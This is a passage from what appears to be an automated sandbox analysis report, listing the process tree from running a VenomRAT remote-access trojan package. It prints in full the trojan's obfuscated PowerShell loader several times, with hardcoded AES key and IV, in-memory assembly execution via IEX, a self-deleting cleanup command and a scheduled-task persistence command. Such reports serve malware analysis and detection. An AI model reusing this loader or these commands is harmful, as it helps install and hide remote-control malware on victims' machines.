[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        8⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4524
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1352).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        8⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5476
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1352).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        8⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious use of SetThreadContext
        
        PID:5264
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5468" "2928" "2856" "2932" "0" "0" "2936" "0" "0" "0" "0" "0"
        7⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6028
      - C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4424" "2968" "2864" "2972" "0" "0" "2976" "0" "0" "0" "0" "0"
        6⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5776
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\Downloads\VenomRAT-V5.6-HVNC\Stub\ClientFix.bat.exe" & ATTRIB -h -s "C:\Users\Admin\Downloads\VenomRAT-V5.6-HVNC\Stub\ClientFix.bat.exe" & del /f "C:\Users\Admin\Downloads\VenomRAT-V5.6-HVNC\Stub\ClientFix.bat.exe"
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:7088
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5032
      - C:\Windows\system32\PING.EXE
        
        PING localhost -n 8
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1592
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM "C:\Users\Admin\Downloads\VenomRAT-V5.6-HVNC\Stub\ClientFix.bat.exe"
        6⤵
        Kills process with taskkill
        
        PID:6232
      - C:\Windows\system32\attrib.exe
        
        ATTRIB -h -s "C:\Users\Admin\Downloads\VenomRAT-V5.6-HVNC\Stub\ClientFix.bat.exe"
        6⤵
        Views/modifies file attributes
        
        PID:6368
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discordapp.com/users/211920723327844352
    3⤵
    PID:6316
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9b4d946f8,0x7ff9b4d94708,0x7ff9b4d94718
      4⤵
      PID:1256
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discordapp.com/users/211920723327844352
    3⤵
    PID:5372
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9b4d946f8,0x7ff9b4d94708,0x7ff9b4d94718
      4⤵
      PID:5360
- C:\Users\Admin\Downloads\VenomRAT-V5.6-HVNC\Venom RAT + HVNC.exe
  "C:\Users\Admin\Downloads\VenomRAT-V5.6-HVNC\Venom RAT + HVNC.exe"
  2⤵
  - Loads dropped DLL
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:3760
- C:\Users\Admin\Downloads\VenomRAT-V5.6-HVNC\Client.exe
  "C:\Users\Admin\Downloads\VenomRAT-V5.6-HVNC\Client.exe"
  2⤵
  - Checks computer location settings
  PID:8412
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "ezez" /tr '"C:\Users\Admin\AppData\Roaming\ezez.exe"' & exit
    3⤵
    PID:8860
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "ezez" /tr '"C:\Users\Admin\AppData\Roaming\ezez.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:9152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp802A.tmp.bat""
    3⤵
    PID:8892
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:2280
  - - C:\Users\Admin\AppData\Roaming\ezez.exe
      "C:\Users\Admin\AppData\Roaming\ezez.exe"
      4⤵
      PID:5348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3572

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3748

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3900

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:8

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:2276

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:5076

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3668

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4312

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:460

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1628

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:1928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:2968

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:1824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:4016

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:2952

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1284

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:404

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5112

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:5560

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:5840

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:6016

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
1⤵
PID:6080

C:\Windows\system32\wbem\wmiprvse.exe
